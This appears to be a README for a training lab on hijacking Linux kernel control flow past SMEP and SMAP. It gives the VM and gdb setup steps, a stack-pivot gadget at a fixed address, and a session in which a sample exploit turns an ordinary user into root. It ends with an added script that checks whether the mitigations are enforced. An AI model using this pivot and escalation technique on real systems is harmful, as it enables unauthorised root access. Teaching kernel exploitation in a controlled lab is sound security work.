A stand (test bench) for practicing CFHjack, control flow hijacking, in the Linux kernel
The purpose of this project is to provide a safe and controlled environment for learning about Linux kernel security and about exploiting vulnerabilities.
Control flow hijacking is a well-known problem in Linux kernel security, so several mitigations exist (the ones exercised here are SMEP and SMAP). This project provides a hands-on environment for learning about these mitigations and practicing exploitation techniques against them.
The three sample programs:
nothing.c: works only without mitigations
smep.c: beats down SMEP
smap.c: wins against both SMEP and SMAP
Get the script that retrieves vmlinux from a bzImage:
wget https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/plain/scripts/extract-vmlinux -O extract-vmlinux.sh
Extract vmlinux from the bzImage:
bash extract-vmlinux.sh bzImage > vmlinux
In the first terminal, run the VM and answer y to both prompts:
bash run.sh
y
y
Then, in the second terminal, attach gdb to the VM's gdb stub and set a breakpoint on the module's ret:
gdb vmlinux
target remote 127.0.0.1:1234
break *0xffffffffc0000057
c
Return to the VM (first terminal) and run the sample:
./smap
And here we are! Watch the kernel buffer overflow!
────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────
► 0xffffffffc0000057 ret <0xffffffff81784532>
↓
0xffffffff81784532 mov esp, 0x83000000 ESP => 0x83000000
0xffffffff81784537 ret
Here you can see the stack pivoting technique: the gadget at 0xffffffff81784532 moves esp to 0x83000000 and returns. Simply press c
in gdb to continue and obtain root.
/exp $ id
uid=1000(chal) gid=1000(chal) groups=1000(chal)
/exp $ grep -o -E "smep|smap" /proc/cpuinfo
smep
smap
/exp $ id
uid=1000(chal) gid=1000(chal) groups=1000(chal)
/exp $ ./smap
[+] device opened
[+] the flow is defeated!
/exp # id
uid=0(root) gid=0(root)
/exp #
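A defender's check to go with the "grep -o -E "smep|smap" /proc/cpuinfo" step in the session above. This is an added example, not a script from the CFHjack project: it reports whether the guest kernel can actually be expected to enforce SMEP and SMAP, because the cpuinfo flag only shows that the (virtual) CPU advertises the feature, while the x86 boot parameters nosmep and nosmap switch either one back off even on a CPU that supports it. The function names, the file arguments and the sample cpuinfo/cmdline contents are constructed for this example.

```shell
#!/bin/sh
# Added example (not part of the CFHjack project): report whether the guest
# kernel can be expected to enforce SMEP and SMAP. Two inputs matter: the
# CPU must advertise the feature (the "flags" line of /proc/cpuinfo), and the
# kernel must not have been booted with the x86 parameters nosmep / nosmap.

# cpu_has_flag CPUINFO_FILE FLAG
# Succeeds when FLAG appears as a whole word on the first "flags" line.
# A plain `grep smep` would also match inside another token, so the line is
# split on whitespace and each token is matched in full.
cpu_has_flag() {
    grep -E '^flags[[:space:]]*:' "$1" | head -n 1 | tr -s ' \t' '\n\n' | grep -qx "$2"
}

# cmdline_disables CMDLINE_FILE PARAM
# Succeeds when PARAM (e.g. nosmep) is present on the kernel command line.
cmdline_disables() {
    tr -s ' \t\n' '\n\n\n' < "$1" | grep -qx "$2"
}

# feature_state NAME CPUINFO_FILE CMDLINE_FILE
# Prints one of: enforced, disabled-by-cmdline, unsupported-by-cpu
feature_state() {
    if ! cpu_has_flag "$2" "$1"; then
        echo "unsupported-by-cpu"
    elif cmdline_disables "$3" "no$1"; then
        echo "disabled-by-cmdline"
    else
        echo "enforced"
    fi
}

# mitigation_report CPUINFO_FILE CMDLINE_FILE
# Prints "smep=<state> smap=<state>" on one line.
mitigation_report() {
    printf 'smep=%s smap=%s\n' \
        "$(feature_state smep "$1" "$2")" \
        "$(feature_state smap "$1" "$2")"
}

# Constructed sample inputs (not captured from the lab VM): a CPU that
# advertises both features, and a command line that turns SMAP back off.
SAMPLE_CPUINFO='processor	: 0
vendor_id	: GenuineIntel
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep smep smap fsgsbase
bugs		:'
SAMPLE_CMDLINE='console=ttyS0 root=/dev/ram0 nosmap quiet'

# sample_report
# Runs the check over the constructed samples; used for self-testing.
sample_report() {
    d=$(mktemp -d)
    printf '%s\n' "$SAMPLE_CPUINFO" > "$d/cpuinfo"
    printf '%s\n' "$SAMPLE_CMDLINE" > "$d/cmdline"
    mitigation_report "$d/cpuinfo" "$d/cmdline"
    rm -rf "$d"
}

# When run as a script on a live guest, report the real system state.
if [ -r /proc/cpuinfo ] && [ -r /proc/cmdline ]; then
    mitigation_report /proc/cpuinfo /proc/cmdline
fi
```

Run it inside the VM after run.sh has booted the guest; "enforced" for both features is the configuration that smap.c targets, and "disabled-by-cmdline" tells you the flag in cpuinfo is not the whole story for that boot.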